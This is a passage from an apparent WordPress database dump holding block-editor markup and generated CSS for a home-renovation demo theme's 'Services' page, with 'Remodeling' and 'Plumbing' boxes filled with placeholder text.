block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"8ca45d75-1c3f-4403-8e4a-a2609af4befe\"} -->\n<style type=\"text/css\"> .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Remodeling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d256038d-61f0-4883-a9b5-65e90d87eb82\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d256038d-61f0-4883-a9b5-65e90d87eb82\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"fcc5e8b7-8bad-4e40-8328-152b289be5c2\"} -->\n<style type=\"text/css\"> .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Plumbing</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Services','','publish','closed','closed','','services','','','2022-08-22 00:25:39','2022-08-22 00:25:39','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=160',0,'page','',0),(340,1,'2021-05-27 05:13:31','2021-05-27 05:13:31','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"1c5d3225-0569-4d60-a1ac-6e88fb037156\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-1c5d3225-0569-4d60-a1ac-6e88fb037156 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-1c5d3225-0569-4d60-a1ac-6e88fb037156 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1c5d3225-0569-4d60-a1ac-6e88fb037156.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"51b777c0-5d50-4095-91d5-bf31db40658c\"} -->\n<style type=\"text/css\"> .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-51b777c0-5d50-4095-91d5-bf31db40658c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-51b777c0-5d50-4095-91d5-bf31db40658c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"ddf56773-d63b-4aa1-a60e-8afa90cf3905\"} -->\n<style type=\"text/css\"> .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ddf56773-d63b-4aa1-a60e-8afa90cf3905 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ddf56773-d63b-4aa1-a60e-8afa90cf3905\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"64187a2f-99ae-4f42-9fb7-d3f586f119c6\"} -->\n<style type=\"text/css\"> .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-64187a2f-99ae-4f42-9fb7-d3f586f119c6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-64187a2f-99ae-4f42-9fb7-d3f586f119c6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"375581fb-9e6e-45fe-9dab-34bea359d209\"} -->\n<style type=\"text/css\"> .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-375581fb-9e6e-45fe-9dab-34bea359d209 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"blockId\":\"825826a4-2470-420b-8975-2a4a1a7868dd\"} -->\n<style type=\"text/css\"> .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-825826a4-2470-420b-8975-2a4a1a7868dd 